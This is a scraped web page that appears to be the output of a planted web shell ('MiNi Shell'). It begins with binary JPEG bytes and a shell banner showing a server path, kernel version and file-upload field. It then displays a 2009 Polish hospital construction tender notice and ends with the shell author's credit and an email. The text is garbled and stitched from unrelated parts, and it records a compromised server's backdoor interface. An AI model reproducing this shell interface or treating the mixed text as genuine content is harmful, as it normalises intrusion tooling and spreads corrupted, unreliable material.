JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090416/62785-N-2009.html

<p class="kh_header"><b>Lublin: Budowa łącznika pomiędzy budynkiem administracyjnym i szpitalem z przeznaczeniem na usługi medyczne</b><br>
<b>Numer ogłoszenia: 62785 - 2009; data zamieszczenia: 16.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Neuropsychiatryczny im. Prof. M. Kaczyńskiego Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Abramowicka 2, 20-442 Lublin, woj. lubelskie, tel. 081 7443061 w. 281.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.snzoz.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa łącznika pomiędzy budynkiem administracyjnym i szpitalem z przeznaczeniem na usługi medyczne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest budowa łącznika pomiędzy budynkiem administracyjnym i szpitalem z przeznaczeniem na usługi medyczne.
W tym celu pomiędzy budynkiem administracyjnym i szpitalnym zaprojektowano dwukondygnacyjny, częściowo podpiwniczony budynek.

Powierzchnia zabudowy - 826.5m2
Powierzchnia użytkowa - 1831.9m2
Kubatura brutto - 7690.0m3

Zakres robót budowlanych obejmuje budowę  trzykondygnacyjnego (w tym jedna podziemna) budynku stanowiącego łącznik pomiędzy budynkiem administracyjnym a szpitalem.
Pociągnęło to za sobą konieczność zmiany układu komunikacyjnego oraz przebiegu sieci
uzbrojenia terenu:
- przebudowa i wykonanie odwodnienia parkingu i drogi wewnętrznej po zachodniej stronie
budynku, pełniącej funkcję drogi pożarowej
- podniesienie terenu przy wejściu do projektowanego łącznika i istniejącej izby przyjęć.
- budowa kanalizacji deszczowej odprowadzającej wodą opadową z dachu łącznika,
budynku administracyjnego i parkingu
- budowa kanalizacji sanitarnej, odprowadzającej ścieki bytowo-gospodarcze
z projektowanego łącznika
- wykonanie przyłącza wodociągowego do projektowanego budynku
- przełożenie sieci i wykonanie przyłącza preizolowanego c.o. i c.w.u.
- wykonanie nowego przyłącza elektroenergetycznego ze stacji transformatorowej
do projektowanego budynku
- likwidacja i wykonanie w nowym miejscu instalacji oświetlenia terenu
- budowa sieci wody lodowej

2. Zakres zaprojektowanych robót budowlanych obejmuje:

1. ARCHITEKTURA

KONSTRUKCJA BUDYNKU
- fundamenty żelbetowe; ramy żelbetowe; ściany parteru i piętra; ściany nośne piwnic żelbetowe, ściany fundamentowe części niepodpiwniczonej, ściany attyk,
- stropodach dwudzielny 
ŚCIANKI DZIAŁOWE
- ścianki działowe na kondygnacji podziemnej, parterze i piętrze, ścianki przepierzeń, przesuwne ściany działowe
OKŁADZINY ŚCIENNE, TYNKI WEWNĘTRZNE I MALOWANIE POMIESZCZEŃ
- tynki cementowo-wapienne kat III na ścianach lub sufitach
- tynki gipsowe na ścianach 
- glazura 
- emalia lateksowa odporna na szorowanie i mycie detergentami, 
-powierzchnie ścian i  sufitów malowane farbami akrylowymi
- odbojnico - poręcze z profili aluminiowych powlekanych

PODŁOGI I POSADZKI
- wykładzina PVC 
- płytki gresowe, szkliwione

IZOLACJE PRZECIWWILGOCIOWE I CIEPLNE
- podłogi zabezpieczyć płynną folią 
- folia PE gr. 0.2 mm 
- papa termozgrzewalna 
- masa uszczelniająca jako pionowa izolacja przeciwwilgociowa 
- wełna mineralna
- styropian EPS
- płyty z wełny mineralnej 
- polistyren ekstrudowany 

SUFITY PODWIESZANE
- demontowalny sufit w korytarzu z paneli, z płyt gipsowych lub wełny
mineralnej

TYNKI I OKŁADZINY ZEWNĘTRZNE
- tynk akrylowy barwiony
- płytki ceramiczne elewacyjne
- aluminiowe panele elewacyjne 

STOLARKA I ŚLUSARKA
- drzwi wewnętrzne
- drzwi p.pożarowe
- okna, drzwi i zestawy aluminiowe zewnętrzne 
- drzwi i zestawy aluminiowe: wewnętrzne 
- świetliki w stropie 
- rolety antywłamaniowe z napędem elektrycznym 

PARAPETY
- wewnętrzne - konglomerat marmuru 
- zewnętrzne - blacha stalowa powlekana 

KOMINY I WENTYLACJA
-kominy wykonane z kształtek ceramicznych 
- nawiewniki higrosterowane w oknach 
- wentylacja stropodachu
-wentylacja mechaniczna wywiewna i nawiewna
-klimatyzacja nawiewno - wywiewna 

POKRYCIE DACHU, RYNNY I RURY SPUSTOWE, OBRÓBKI BLACHARSKIE
-Papa asfaltowa termozgrzewalna wierzchniego i spodniego krycia
-Rynny i rury spustowe z blachy stalowej powlekanej 
-Obróbki blacharskie -blacha stalowa, powlekana

PRACE ADAPTACYJNE W BUDYNKU SZPITALNYM
- rozebranie fragmentu niskiej części budynku szpitalnego i podniesienie poziomu podłogi
w istniejącym holu
- przebudowa otworów w ścianie szczytowej, związana z budową szybu windowego

PRACE ADAPTACYJNE W BUDYNKU ADMINISTRACYJNYM
- przebudowa klatki schodowej
- wymiana drzwi w korytarzach wraz ze zmianą kierunku otwieralności
- przebudowa otworów w ścianie szczytowej

2. INSTALACJA WOD-KAN i C.W.U.
Zakres robót obejmuje: 
1.instalację wody zimnej
2.instalację c.w. wraz z cyrkulacją
3.instalację kanalizacji sanitarnej

3. INSTALACJA CO i CT ORAZ MODERNIZACJA WĘZŁA CIEPLNEGO
Zakres prac obejmuje:
- montaż instalacji co z rur stalowych ocynkowanych
- montaż grzejników stalowych, profilowanych, płytowych oraz armatury i osprzętu, izolacji termicznej, 
Modernizacja węzła cieplnego w budynku SOMATYKA
W związku z kolizją projektowanej rozbudowy szpitala zmianie ulega trasa przyłącza c.o i c.w  co pociąga za sobą modernizację  węzła wraz z instalacją c.o., c. w oraz wod- kan. 


4. INSTALACJA WENTYLACJI MECHANICZNEJ I KLIMATYZACJI
Zakres prac obejmuje:
1.   Wentylację mechaniczną pracowni hydroterapii
2.Wentylację mechaniczną i klimatyzację pomieszczeń administracyjnych
3.Klimatyzację pracowni rezonansu magnetycznego
4.Wspomaganie wentylacji grawitacyjnej w pomieszczeniach sanitarnych

5. INSTALACJA GAZÓW MEDYCZNYCH
Zakres prac obejmuje:
- instalację tlenową,
- instalacje sprężonego powietrza
- instalację próżni

6. SIEĆ CIEPLNA PREIZOLOWANA CO I C.W.U. WRAZ Z PRZYŁĄCZAMI
Zakres prac obejmuje przeprojektowanie przebiegu trasy sieci cieplnej preizolowanej do istniejącego budynku Somatyka oraz zaprojektowanie przyłącza dla projektowanego budynku łącznika.

7. PRZYŁACZE WODY LODOWEJ
Zakres prac obejmuje zaprojektowanie przebiegu przyłącza wody lodowej od agregatu do budynku łącznika.

8. PRZYŁĄCZA WODOCIAGOWE, SIECI KANALIZACJI SANITARNEJ I DESZCZOWEJ 
Zakres prac obejmuje wykonanie przyłącza wodociągowego wraz z zestawem wodomierzowym, przykanalika kanalizacji sanitarnej oraz odwodnienia dachu, chodników i parkingu przy łączniku.


9. INSTALACJE ELEKTRYCZNE I TELETECHNICZNE
Zakres prac obejmuje :
1)Sieci zewnętrzne: a) zasilanie energetyczne kablowe budynku, b) oświetlenie zewnętrzne;
2)Przebudowa zasilania rozdzielnic RG;
3)Instalacje elektryczne wewnętrzne w budynku:
wewnętrzne linie zasilające projektowane rozdzielnice;
tablica  rozdzielcza główna TG;
tablice rozdzielcze piętrowe T-...;
tablice wydzielonej instalacji elektrycznej TK-...;
instalacje elektryczne:
- instalacja oświetlenia podstawowego,
- instalacja oświetlenia awaryjnego (ewakuacyjnego)
- instalacja gniazd wtyczkowych 230 V AC,
- instalacja przyzywowa dla niepełnosprawnych,
- instalacja siłowa,
- wydzielona instalacja elektryczna (gn. 230V AC zas. komputery)
instalację odgromową,
instalację połączeń wyrównawczych;
ochronę od porażeń prądem elektrycznym
4)Instalacje strukturalne
5)Instalacje teletechniczne

Wszystkie wskazane w projekcie nazwy własne produktów można zastąpić równoważnymi..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.00-8, 45.33.10.00-6, 45.33.00.00-9, 45.31.00.00-3, 45.31.31.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawcy przystępujący do przetargu winni wnieść wadium w wysokości: 100 000,00 zł (słownie: sto tysięcy złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O zamówienie mogą ubiegać się wszyscy wykonawcy, którzy spełniają warunki określone w art. 22 oraz nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 Ustawy prawo zamówień publicznych, tj.
1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawiają pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
- Wykaz wykonanych 4 robót budowlanych w okresie ostatnich pięciu lat (rozpoczęcie i zakończenie roboty) przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie.  Każda z wykazanych robót musi opiewać na kwotę nie mniejszą niż wartość złożonej oferty. Każda z wykazanych robót musi być zrealizowana  w ramach odrębnej umowy oraz w swym zakresie zawierać budowę obiektu wraz z instalacją wewnętrzną, przyłączami i zagospodarowaniem terenu wokół budynku. Co najmniej dwie z wykazanych robót budowlanych muszą być wykonane w obiektach służby zdrowia. 
-Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca. W przypadku, gdy wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował należy załączyć do oferty pisemne zobowiązanie innych podmiotów do udostępnienia tych urządzeń i narzędzi.
Wymagane jest posiadanie m.in.: 
- koparko - ładowarka - 2 szt.
- wywrotka - 1 szt.
- samochód skrzyniowy - 1 szt.
- żuraw samojezdny - 1 szt.
-Informacja na temat przeciętnej liczby zatrudnionych pracowników. Zamawiający wymaga wykazania przeciętnej liczby zatrudnionych pracowników w 2008 roku na poziomie co najmniej 150 osób.
- Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności. W przypadku, gdy wykonawca wskazał osoby, którymi będzie dysponował należy załączyć do oferty pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. Zamawiający wymaga aby w wykonywaniu zamówienia uczestniczyło co najmniej 30 osób,  w tym             -kierownik budowy (branża konstrukcyjno- budowlana)
- kierownik robót elektrycznych  (branża instalacji elektrycznych)
-kierownik robót instalacji sanitarnych (branża wod-kan, co, wentylacja)                                                                      
- kierownik robót elektrycznych (branża instalacji teletechnicznych)
- Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia jeżeli ustawy nakładają obowiązek takich uprawnień. Zamawiający wymaga załączenia kserokopii uprawnień wg branż niżej wymienionych w pełnym zakresie:
- branża konstrukcyjno- budowlana;
- branża wod-kan, co, wentylacja, 
- branża instalacji elektrycznych
- branża instalacji teletechnicznych
potwierdzonych za zgodność z oryginałem oraz załączenia aktualnych zaświadczeń o przynależności do właściwej izby samorządu zawodowego.
1.3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
- Sprawozdanie finansowe za 2008 rok wraz z opinią biegłego rewidenta zgodnie z przepisami ustawy o rachunkowości o badanym sprawozdaniu,  a jeżeli okres prowadzenia działalności jest krótszy - za ten okres. 
Zamawiający wymaga przedłożenia sprawozdania finansowego za 2008 rok wraz z opinią biegłego rewidenta, potwierdzającego osiągnięcie przychodów ze sprzedaży produktów, towarów i usług na poziomie co najmniej 50 000 000,00 zł (słownie: pięćdziesiąt milionów złotych). 
- Informacja banku, lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzająca  wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Zamawiający wymaga, aby wykonawca wykazał posiadanie środków finansowych lub zdolność kredytową na kwotę nie mniejsza niż 10 000 000,00 zł (słownie: dziesięć milionów złotych).
- Polisa, a w przypadku jej braku inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. Zamawiający wymaga przedłożenia ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejsza niż 5 000 000,00 zł (słownie: pięć milionów złotych).
1.4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia

Ocena spełniania warunków udziału w postępowaniu określonych w art. 22 ust. 1 pkt. 1-4 ustawy - prawo zamówień publicznych dokonana zostanie zgodnie z formułą spełnia  - nie spełnia  na podstawie informacji zawartych w dokumentach i oświadczeniach wyszczególnionych w pkt 6.1, 6.2 SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 6.1 Na potwierdzenie spełniania warunków wykonawca składa oświadczenie z art. 22 i 24 Ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych. (załącznik nr 2 do siwz).

W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004- Prawo Zamówień Publicznych zamawiający żąda następujących dokumentów lub ich kserokopii poświadczonych za zgodność z oryginałem:
6.2.1.Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6.2.2. Aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6.2.3. Aktualnej informacji z Krajowego Rejestru karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6.2.4. Aktualnej informacji z Krajowego Rejestru karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

W celu potwierdzenia posiadania niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawienia pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia zamawiający żąda następujących dokumentów i oświadczeń.

6.2.5. Wykaz wykonanych 4 robót budowlanych w okresie ostatnich pięciu lat (rozpoczęcie i zakończenie roboty) przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. Każda z wykazanych robót musi opiewać na kwotę nie mniejszą niż wartość złożonej oferty. Każda z wykazanych robót musi być zrealizowana  w ramach odrębnej umowy oraz w swym zakresie zawierać budowę obiektu wraz z instalacją wewnętrzną, przyłączami i zagospodarowaniem terenu wokół budynku. Co najmniej dwie z wykazanych robót budowlanych muszą być wykonane w obiektach służby zdrowia.

6.2.6.Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca. W przypadku, gdy wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował należy załączyć do oferty pisemne zobowiązanie innych podmiotów do udostępnienia tych urządzeń i narzędzi.
Wymagane jest posiadanie m.in.: 
- koparko - ładowarka - 2 szt.
- wywrotka - 2 szt.
- samochód skrzyniowy - 1 szt.
- żuraw samojezdny - 1 szt.

6.2.7. Informacja na temat przeciętnej liczby zatrudnionych pracowników. Zamawiający wymaga wykazania przeciętnej liczby zatrudnionych pracowników w 2008 roku na poziomie co najmniej 150 osób.

6.2.8. Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności. W przypadku, gdy wykonawca wskazał osoby, którymi będzie dysponował należy załączyć do oferty pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. Zamawiający wymaga aby w wykonywaniu zamówienia uczestniczyło co najmniej 30 osób, w tym 
-kierownik budowy (branża konstrukcyjno- budowlana)
- kierownik robót elektrycznych  (branża instalacji elektrycznych)
-kierownik robót instalacji sanitarnych (branża wod-kan, co, wentylacja)                                                                      
- kierownik robót elektrycznych (branża instalacji teletechnicznych)

6.2.9. Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia jeżeli ustawy nakładają obowiązek takich uprawnień. Zamawiający wymaga załączenia kserokopii uprawnień wg branż niżej wymienionych w pełnym zakresie:
- branża konstrukcyjno- budowlana;
- branża wod-kan, co, wentylacja, 
- branża instalacji elektrycznych
- branża instalacji teletechnicznych
potwierdzonych za zgodność z oryginałem oraz załączenia aktualnych zaświadczeń o przynależności do właściwej izby samorządu zawodowego.

W celu potwierdzenia, opisanego przez zamawiającego warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia zamawiający żąda następujących dokumentów:
6.2.10. Sprawozdanie finansowe za 2008 rok wraz z opinią biegłego rewidenta zgodnie z przepisami ustawy o rachunkowości o badanym sprawozdaniu,  a jeżeli okres prowadzenia działalności jest krótszy - za ten okres. 
Zamawiający wymaga przedłożenia sprawozdania finansowego za 2008 rok wraz z opinią biegłego rewidenta, potwierdzającego osiągnięcie przychodów ze sprzedaży produktów, towarów i usług na poziomie co najmniej 50 000 000,00 zł (słownie: pięćdziesiąt milionów złotych). 
6.2.11. Informacja banku, lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzająca  wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Zamawiający wymaga, aby wykonawca wykazał posiadanie środków finansowych lub zdolność kredytową na kwotę nie mniejsza niż 10 000 000,00 zł (słownie: dziesięć milionów złotych).
6.2.12. Polisa, a w przypadku jej braku inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. Zamawiający wymaga przedłożenia ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejsza niż 5 000 000,00 zł (słownie: pięć milionów złotych).

6.2.13. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej  zamiast dokumentów o których mowa w pkt 6.2.1 i 6.2.2. SIWZ, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości
b) nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie społeczne i zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu 
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie
Dokumenty o których mowa w punkcie 6.2.13. podpunkcie a) i c) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokumenty o których mowa punkcie 6.2.13 podpunkcie b) powinny być wystawione nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania , nie wydaje się dokumentów o których mowa powyżej zastępuje się je dokumentami zawierającymi oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w  którym Wykonawca ma siedzibę lub miejsce zamieszkania.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.snzoz.lublin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Abramowicka 2; 20-442 Lublin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2009 godzina 09:00, miejsce: Kancelaria Szpitala Neuropsychiatrycznego im. Prof. M. Kaczyńskiego SP ZOZ w Lublinie ul. Abramowicka 2.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com